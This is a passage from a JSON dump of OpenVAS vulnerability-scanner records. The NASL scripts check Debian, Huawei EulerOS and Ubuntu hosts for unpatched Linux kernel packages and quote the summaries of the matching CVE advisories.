report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-kbuild-4.9\", ver:\"4.9.30-2+deb9u5\", rls:\"DEB9\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-libc-dev\", ver:\"4.9.30-2+deb9u5\", rls:\"DEB9\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-manual-4.9\", ver:\"4.9.30-2+deb9u5\", rls:\"DEB9\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-perf-4.9\", ver:\"4.9.30-2+deb9u5\", rls:\"DEB9\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-source-4.9\", ver:\"4.9.30-2+deb9u5\", rls:\"DEB9\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-support-4.9.0-3\", ver:\"4.9.30-2+deb9u5\", rls:\"DEB9\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"usbip\", ver:\"4.9.30-2+deb9u5\", rls:\"DEB9\")) != NULL) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if(__pkg_match) {\n exit(99);\n}\n", "cvss": {"score": 7.7, "vector": "AV:A/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2020-06-09T17:51:01", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-13695", "CVE-2017-14489", "CVE-2017-13694", "CVE-2017-13693", "CVE-2017-14106", "CVE-2017-14140", "CVE-2017-10661", "CVE-2017-1000251", "CVE-2017-1000370", "CVE-2017-1000371", "CVE-2017-12154"], "description": "The remote host is missing an update for the Huawei EulerOS\n ", "modified": "2020-06-08T00:00:00", "published": "2020-01-23T00:00:00", "id": "OPENVAS:1361412562311220171245", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562311220171245", "type": "openvas", "title": "Huawei EulerOS: Security Advisory for kernel (EulerOS-SA-2017-1245)", "sourceData": "# Copyright (C) 2020 Greenbone Networks GmbH\n# Some text descriptions might be excerpted from (a) referenced\n# source(s), and are Copyright (C) by the respective right holder(s).\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.1.2.2017.1245\");\n script_version(\"2020-06-08T06:52:36+0000\");\n script_cve_id(\"CVE-2017-1000251\", \"CVE-2017-1000370\", \"CVE-2017-10661\", \"CVE-2017-12154\", \"CVE-2017-13693\", \"CVE-2017-13694\", \"CVE-2017-13695\", \"CVE-2017-14106\", \"CVE-2017-14140\", \"CVE-2017-14489\");\n script_tag(name:\"cvss_base\", value:\"7.7\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:A/AC:L/Au:S/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-06-08 06:52:36 +0000 (Mon, 08 Jun 2020)\");\n script_tag(name:\"creation_date\", value:\"2020-01-23 11:00:56 +0000 (Thu, 23 Jan 2020)\");\n script_name(\"Huawei EulerOS: Security Advisory for kernel (EulerOS-SA-2017-1245)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2020 Greenbone Networks GmbH\");\n script_family(\"Huawei EulerOS Local Security Checks\");\n script_dependencies(\"gb_huawei_euleros_consolidation.nasl\");\n script_mandatory_keys(\"ssh/login/euleros\", \"ssh/login/rpms\", re:\"ssh/login/release=EULEROS-2\\.0SP1\");\n\n script_xref(name:\"EulerOS-SA\", value:\"2017-1245\");\n script_xref(name:\"URL\", value:\"https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2017-1245\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the Huawei EulerOS\n 'kernel' package(s) announced via the EulerOS-SA-2017-1245 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"The iscsi_if_rx function in drivers/scsi/scsi_transport_iscsi.c in the Linux kernel through 4.13.2 allows local users to cause a denial of service (panic) by leveraging incorrect length validation.(CVE-2017-14489)\n\nThe move_pages system call in mm/migrate.c in the Linux kernel before 4.12.9 doesn't check the effective uid of the target process, enabling a local attacker to learn the memory layout of a setuid executable despite ASLR.(CVE-2017-14140)\n\nThe offset2lib patch as used in the Linux Kernel contains a vulnerability that allows a PIE binary to be execve()'ed with 1GB of arguments or environmental strings then the stack occupies the address 0x80000000 and the PIE binary is mapped above 0x40000000 nullifying the protection of the offset2lib patch. This affects Linux Kernel version 4.11.5 and earlier. This is a different issue than CVE-2017-1000371. This issue appears to be limited to i386 based systems.(CVE-2017-1000370)\n\nRace condition in fs/timerfd.c in the Linux kernel before 4.10.15 allows local users to gain privileges or cause a denial of service (list corruption or use-after-free) via simultaneous file-descriptor operations that leverage improper might_cancel queueing.(CVE-2017-10661)\n\nThe acpi_ns_evaluate() function in drivers/acpi/acpica/nseval.c in the Linux kernel through 4.12.9 does not flush the operand cache and causes a kernel stack dump, which allows local users to obtain sensitive information from kernel memory and bypass the KASLR protection mechanism (in the kernel through 4.9) via a crafted ACPI table.(CVE-2017-13695)\n\nThe acpi_ps_complete_final_op() function in drivers/acpi/acpica/psobject.c in the Linux kernel through 4.12.9 does not flush the node and node_ext caches and causes a kernel stack dump, which allows local users to obtain sensitive information from kernel memory and bypass the KASLR protection mechanism (in the kernel through 4.9) via a crafted ACPI table.(CVE-2017-13694)\n\nThe acpi_ds_create_operands() function in drivers/acpi/acpica/dsutils.c in the Linux kernel through 4.12.9 does not flush the operand cache and causes a kernel stack dump, which allows local users to obtain sensitive information from kernel memory and bypass the KASLR protection mechanism (in the kernel through 4.9) via a crafted ACPI table.(CVE-2017-13693)\n\nThe tcp_disconnect function in net/ipv4/tcp.c in the Linux kernel before 4.12 allows local users to cause a denial of service (__tcp_select_window divide-by-zero error and system crash) by triggering a disconnect within a certain tcp_recvmsg code path.(CVE-2017-14106)\n\nThe native Bluetooth stack in the Linux Kernel (BlueZ), starti ...\n\n Description truncated. Please see the references for more information.\");\n\n script_tag(name:\"affected\", value:\"'kernel' package(s) on Huawei EulerOS V2.0SP1.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"EULEROS-2.0SP1\") {\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel\", rpm:\"kernel~3.10.0~229.49.1.149\", rls:\"EULEROS-2.0SP1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-debug\", rpm:\"kernel-debug~3.10.0~229.49.1.149\", rls:\"EULEROS-2.0SP1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-debuginfo\", rpm:\"kernel-debuginfo~3.10.0~229.49.1.149\", rls:\"EULEROS-2.0SP1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-debuginfo-common-x86_64\", rpm:\"kernel-debuginfo-common-x86_64~3.10.0~229.49.1.149\", rls:\"EULEROS-2.0SP1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-devel\", rpm:\"kernel-devel~3.10.0~229.49.1.149\", rls:\"EULEROS-2.0SP1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-headers\", rpm:\"kernel-headers~3.10.0~229.49.1.149\", rls:\"EULEROS-2.0SP1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-ori\", rpm:\"kernel-ori~3.10.0~229\", rls:\"EULEROS-2.0SP1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-tools\", rpm:\"kernel-tools~3.10.0~229.49.1.149\", rls:\"EULEROS-2.0SP1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-tools-libs\", rpm:\"kernel-tools-libs~3.10.0~229.49.1.149\", rls:\"EULEROS-2.0SP1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"perf\", rpm:\"perf~3.10.0~229.49.1.149\", rls:\"EULEROS-2.0SP1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"python-perf\", rpm:\"python-perf~3.10.0~229.49.1.149\", rls:\"EULEROS-2.0SP1\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if (__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);", "cvss": {"score": 7.7, "vector": "AV:A/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2020-06-09T17:48:36", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-9806", "CVE-2017-11176", "CVE-2016-9794", "CVE-2016-9754", "CVE-2017-12188", "CVE-2017-1000111", "CVE-2016-9793", "CVE-2017-1000252", "CVE-2017-10810", "CVE-2017-11473", "CVE-2017-10661", "CVE-2017-1000251", "CVE-2017-1000112", "CVE-2017-1000364", "CVE-2017-10911", "CVE-2017-1000410", "CVE-2017-1000370", "CVE-2017-12153", "CVE-2017-12154", "CVE-2017-11600", "CVE-2017-1000365"], "description": "The remote host is missing an update for the Huawei EulerOS\n ", "modified": "2020-06-08T00:00:00", "published": "2020-01-23T00:00:00", "id": "OPENVAS:1361412562311220191498", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562311220191498", "type": "openvas", "title": "Huawei EulerOS: Security Advisory for kernel (EulerOS-SA-2019-1498)", "sourceData": "# Copyright (C) 2020 Greenbone Networks GmbH\n# Some text descriptions might be excerpted from (a) referenced\n# source(s), and are Copyright (C) by the respective right holder(s).\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.1.2.2019.1498\");\n script_version(\"2020-06-08T06:52:36+0000\");\n script_cve_id(\"CVE-2016-9754\", \"CVE-2016-9793\", \"CVE-2016-9794\", \"CVE-2016-9806\", \"CVE-2017-1000111\", \"CVE-2017-1000112\", \"CVE-2017-1000251\", \"CVE-2017-1000252\", \"CVE-2017-1000364\", \"CVE-2017-1000365\", \"CVE-2017-1000370\", \"CVE-2017-1000410\", \"CVE-2017-10661\", \"CVE-2017-10810\", \"CVE-2017-10911\", \"CVE-2017-11176\", \"CVE-2017-11473\", \"CVE-2017-11600\", \"CVE-2017-12153\", \"CVE-2017-12154\", \"CVE-2017-12188\");\n script_tag(name:\"cvss_base\", value:\"7.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-06-08 06:52:36 +0000 (Mon, 08 Jun 2020)\");\n script_tag(name:\"creation_date\", value:\"2020-01-23 11:56:59 +0000 (Thu, 23 Jan 2020)\");\n script_name(\"Huawei EulerOS: Security Advisory for kernel (EulerOS-SA-2019-1498)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2020 Greenbone Networks GmbH\");\n script_family(\"Huawei EulerOS Local Security Checks\");\n script_dependencies(\"gb_huawei_euleros_consolidation.nasl\");\n script_mandatory_keys(\"ssh/login/euleros\", \"ssh/login/rpms\", re:\"ssh/login/release=EULEROSVIRT-3\\.0\\.1\\.0\");\n\n script_xref(name:\"EulerOS-SA\", value:\"2019-1498\");\n script_xref(name:\"URL\", value:\"https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2019-1498\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the Huawei EulerOS\n 'kernel' package(s) announced via the EulerOS-SA-2019-1498 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"An integer overflow vulnerability was found in the ring_buffer_resize() calculations in which a privileged user can adjust the size of the ringbuffer message size. These calculations can create an issue where the kernel memory allocator will not allocate the correct count of pages yet expect them to be usable. This can lead to the ftrace() output to appear to corrupt kernel memory and possibly be used for privileged escalation or more likely kernel panic.(CVE-2016-9754)\n\nA flaw was found in the Linux kernel's implementation of setsockopt for the SO_{SND<pipe>RCV}BUFFORCE setsockopt() system call. Users with non-namespace CAP_NET_ADMIN are able to trigger this call and create a situation in which the sockets sendbuff data size could be negative. This could adversely affect memory allocations and create situations where the system could crash or cause memory corruption.(CVE-2016-9793)\n\nA use-after-free vulnerability was found in ALSA pcm layer, which allows local users to cause a denial of service, memory corruption, or possibly other unspecified impact. Due to the nature of the flaw, privilege escalation cannot be fully ruled out, although we believe it is unlikely.(CVE-2016-9794)\n\nA double free vulnerability was found in netlink_dump, which could cause a denial of service or possibly other unspecified impact. Due to the nature of the flaw, privilege escalation cannot be fully ruled out, although we believe it is unlikely.(CVE-2016-9806)\n\nA race condition issue leading to a use-after-free flaw was found in the way the raw packet sockets are implemented in the Linux kernel networking subsystem handling synchronization. A local user able to open a raw packet socket (requires the CAP_NET_RAW capability) can use this issue to crash the system.(CVE-2017-1000111)\n\nAn exploitable memory corruption flaw was found in the Linux kernel. The append path can be erroneously switched from UFO to non-UFO in ip_ufo_append_data() when building an UFO packet with MSG_MORE option. If unprivileged user namespaces are available, this flaw can be exploited to gain root privileges.(CVE-2017-1000112)\n\nA stack buffer overflow flaw was found in the way the Bluetooth subsystem of the Linux kernel processed pending L2CAP configuration responses from a client. On systems with the stack protection feature enabled in the kernel (CONFIG_CC_STACKPROTECTOR=y, which is enabled on all architectures other than s390x and ppc64le), an unauthenticated attacker able to initiate a connection to a system via Bluetooth could use this flaw to crash the system. Due to the nature of the stack protection feature, code execute ...\n\n Description truncated. Please see the references for more information.\");\n\n script_tag(name:\"affected\", value:\"'kernel' package(s) on Huawei EulerOS Virtualization 3.0.1.0.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"EULEROSVIRT-3.0.1.0\") {\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel\", rpm:\"kernel~3.10.0~862.14.1.6_42\", rls:\"EULEROSVIRT-3.0.1.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-devel\", rpm:\"kernel-devel~3.10.0~862.14.1.6_42\", rls:\"EULEROSVIRT-3.0.1.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-headers\", rpm:\"kernel-headers~3.10.0~862.14.1.6_42\", rls:\"EULEROSVIRT-3.0.1.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-tools\", rpm:\"kernel-tools~3.10.0~862.14.1.6_42\", rls:\"EULEROSVIRT-3.0.1.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-tools-libs\", rpm:\"kernel-tools-libs~3.10.0~862.14.1.6_42\", rls:\"EULEROSVIRT-3.0.1.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-tools-libs-devel\", rpm:\"kernel-tools-libs-devel~3.10.0~862.14.1.6_42\", rls:\"EULEROSVIRT-3.0.1.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"perf\", rpm:\"perf~3.10.0~862.14.1.6_42\", rls:\"EULEROSVIRT-3.0.1.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"python-perf\", rpm:\"python-perf~3.10.0~862.14.1.6_42\", rls:\"EULEROSVIRT-3.0.1.0\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if (__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2019-05-29T18:34:51", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-16525", "CVE-2017-12188", "CVE-2017-14489", "CVE-2017-15265", "CVE-2017-15649", "CVE-2017-16527", "CVE-2017-15537", "CVE-2017-16526", "CVE-2017-16533", "CVE-2017-12192", "CVE-2017-14156", "CVE-2017-1000255", "CVE-2017-16529", "CVE-2017-12153", "CVE-2017-16531", "CVE-2017-16534", "CVE-2017-14954", "CVE-2017-12154", "CVE-2017-16530", "CVE-2017-12190"], "description": "The remote host is missing an update for the ", "modified": "2019-03-13T00:00:00", "published": "2017-11-22T00:00:00", "id": "OPENVAS:1361412562310843376", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310843376", "type": "openvas", "title": "Ubuntu Update for linux USN-3487-1", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_ubuntu_USN_3487_1.nasl 14140 2019-03-13 12:26:09Z cfischer $\n#\n# Ubuntu Update for linux USN-3487-1\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.843376\");\n script_version(\"$Revision: 14140 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-13 13:26:09 +0100 (Wed, 13 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2017-11-22 07:32:50 +0100 (Wed, 22 Nov 2017)\");\n script_cve_id(\"CVE-2017-12188\", \"CVE-2017-1000255\", \"CVE-2017-12153\", \"CVE-2017-12154\",\n \"CVE-2017-12190\", \"CVE-2017-12192\", \"CVE-2017-14156\", \"CVE-2017-14489\",\n \"CVE-2017-14954\", \"CVE-2017-15265\", \"CVE-2017-15537\", \"CVE-2017-15649\",\n \"CVE-2017-16525\", \"CVE-2017-16526\", \"CVE-2017-16527\", \"CVE-2017-16529\",\n \"CVE-2017-16530\", \"CVE-2017-16531\", \"CVE-2017-16533\", \"CVE-2017-16534\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Ubuntu Update for linux USN-3487-1\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'linux'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"It was discovered that the KVM subsystem in\n the Linux kernel did not properly keep track of nested levels in guest page\n tables. A local attacker in a guest VM could use this to cause a denial of\n service (host OS crash) or possibly execute arbitrary code in the host OS.\n (CVE-2017-12188) It was discovered that on the PowerPC architecture, the kernel\n did not properly sanitize the signal stack when handling sigreturn(). A local\n attacker could use this to cause a denial of service (system crash) or possibly\n execute arbitrary code. (CVE-2017-1000255) Bo Zhang discovered that the netlink\n wireless configuration interface in the Linux kernel did not properly validate\n attributes when handling certain requests. A local attacker with the\n CAP_NET_ADMIN could use this to cause a denial of service (system crash).\n (CVE-2017-12153) It was discovered that the nested KVM implementation in the\n Linux kernel in some situations did not properly prevent second level guests\n from reading and writing the hardware CR8 register. A local attacker in a guest\n could use this to cause a denial of service (system crash). (CVE-2017-12154)\n Vitaly Mayatskikh discovered that the SCSI subsystem in the Linux kernel did not\n properly track reference counts when merging buffers. A local attacker could use\n this to cause a denial of service (memory exhaustion). (CVE-2017-12190) It was\n discovered that the key management subsystem in the Linux kernel did not\n properly restrict key reads on negatively instantiated keys. A local attacker\n could use this to cause a denial of service (system crash). (CVE-2017-12192) It\n was discovered that the ATI Radeon framebuffer driver in the Linux kernel did\n not properly initialize a data structure returned to user space. A local\n attacker could use this to expose sensitive information (kernel memory).\n (CVE-2017-14156) ChunYu Wang discovered that the iSCSI transport implementation\n in the Linux kernel did not properly validate data structures. A local attacker\n could use this to cause a denial of service (system crash). (CVE-2017-14489)\n Alexander Potapenko discovered an information leak in the waitid implementation\n of the Linux kernel. A local attacker could use this to expose sensitive\n information (kernel memory). (CVE-2017-14954) It was discovered that a race\n condition existed in the ALSA subsystem of the Linux kernel when creating and\n deleting a port via ioctl(). A local attacker could use this to cause a denial\n of service (system crash) or possibly execute arbitrary code. (CVE-2017-15265)\n Dmitry Vyukov discovered that the Floating Point Unit (fpu) subsystem in the\n Linux kernel did not properly handl ... Description truncated, for more\n information please check the Reference URL\");\n script_tag(name:\"affected\", value:\"linux on Ubuntu 17.10\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n\n script_xref(name:\"USN\", value:\"3487-1\");\n script_xref(name:\"URL\", value:\"http://www.ubuntu.com/usn/usn-3487-1/\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\", re:\"ssh/login/release=UBUNTU17\\.10\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = dpkg_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"UBUNTU17.10\")\n{\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.13.0-1006-raspi2\", ver:\"4.13.0-1006.6\", rls:\"UBUNTU17.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.13.0-17-generic\", ver:\"4.13.0-17.20\", rls:\"UBUNTU17.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.13.0-17-generic-lpae\", ver:\"4.13.0-17.20\", rls:\"UBUNTU17.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.13.0-17-lowlatency\", ver:\"4.13.0-17.20\", rls:\"UBUNTU17.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-generic\", ver:\"4.13.0.17.18\", rls:\"UBUNTU17.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-generic-lpae\", ver:\"4.13.0.17.18\", rls:\"UBUNTU17.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-lowlatency\", ver:\"4.13.0.17.18\", rls:\"UBUNTU17.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-raspi2\", ver:\"4.13.0.1006.4\", rls:\"UBUNTU17.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-06-09T19:17:21", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-11176", "CVE-2017-1000380", "CVE-2017-1000111", "CVE-2017-14489", "CVE-2017-7889", "CVE-2017-14106", "CVE-2017-14140", "CVE-2017-10661", "CVE-2017-1000251", "CVE-2017-10911", "CVE-2017-7482", "CVE-2017-14156", "CVE-2017-14340", "CVE-2017-12134", "CVE-2017-12153", "CVE-2017-1000363", "CVE-2017-7542", "CVE-2017-12154", "CVE-2017-11600", "CVE-2017-1000365"], "description": "Several vulnerabilities have been discovered in the Linux kernel that\nmay lead to a privilege escalation, denial of service or information\nleaks.\n\nCVE-2017-7482\n\nShi Lei discovered that RxRPC Kerberos 5 ticket handling code does\nnot properly verify metadata, leading to information disclosure,\ndenial of service or potentially execution of arbitrary code.\n\nCVE-2017-7542\n\nAn integer overflow vulnerability in the ip6_find_1stfragopt()\nfunction was found allowing a local attacker with privileges to open\nraw sockets to cause a denial of service.\n\nCVE-2017-7889\n\nTommi Rantala and Brad Spengler reported that the mm subsystem does\nnot properly enforce the CONFIG_STRICT_DEVMEM protection mechanism,\nallowing a local attacker with access to /dev/mem to obtain\nsensitive information or potentially execute arbitrary code.\n\nDescription truncated. Please see the references for more information.\n\nFor Debian 7 ", "modified": "2020-06-08T00:00:00", "published": "2018-02-07T00:00:00", "id": "OPENVAS:1361412562310891099", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310891099", "type": "openvas", "title": "Debian LTS: Security Advisory for linux (DLA-1099-1)", "sourceData": "# Copyright (C) 2018 Greenbone Networks GmbH\n# Some text descriptions might be excerpted from (a) referenced\n# source(s), and are Copyright (C) by the respective right holder(s).\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.891099\");\n script_version(\"2020-06-08T06:52:36+0000\");\n script_cve_id(\"CVE-2017-1000111\", \"CVE-2017-1000251\", \"CVE-2017-1000363\", \"CVE-2017-1000365\", \"CVE-2017-1000380\", \"CVE-2017-10661\", \"CVE-2017-10911\", \"CVE-2017-11176\", \"CVE-2017-11600\", \"CVE-2017-12134\", \"CVE-2017-12153\", \"CVE-2017-12154\", \"CVE-2017-14106\", \"CVE-2017-14140\", \"CVE-2017-14156\", \"CVE-2017-14340\", \"CVE-2017-14489\", \"CVE-2017-7482\", \"CVE-2017-7542\", \"CVE-2017-7889\");\n script_name(\"Debian LTS: Security Advisory for linux (DLA-1099-1)\");\n script_tag(name:\"last_modification\", value:\"2020-06-08 06:52:36 +0000 (Mon, 08 Jun 2020)\");\n script_tag(name:\"creation_date\", value:\"2018-02-07 00:00:00 +0100 (Wed, 07 Feb 2018)\");\n script_tag(name:\"cvss_base\", value:\"7.7\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:A/AC:L/Au:S/C:C/I:C/A:C\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n script_xref(name:\"URL\", value:\"https://lists.debian.org/debian-lts-announce/2017/09/msg00017.html\");\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH http://greenbone.net\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\", re:\"ssh/login/release=DEB7\");\n\n script_tag(name:\"affected\", value:\"linux on Debian Linux\");\n\n script_tag(name:\"solution\", value:\"For Debian 7 'Wheezy', these problems have been fixed in version\n3.2.93-1. This version also includes bug fixes from upstream versions\nup to and including 3.2.93.\n\nFor Debian 8 'Jessie', these problems have been fixed in version\n3.16.43-2+deb8u4 or were fixed in an earlier version.\n\nFor Debian 9 'Stretch', these problems have been fixed in version\n4.9.30-2+deb9u4 or were fixed in an earlier version.\n\nWe recommend that you upgrade your linux packages.\");\n\n script_tag(name:\"summary\", value:\"Several vulnerabilities have been discovered in the Linux kernel that\nmay lead to a privilege escalation, denial of service or information\nleaks.\n\nCVE-2017-7482\n\nShi Lei discovered that RxRPC Kerberos 5 ticket handling code does\nnot properly verify metadata, leading to information 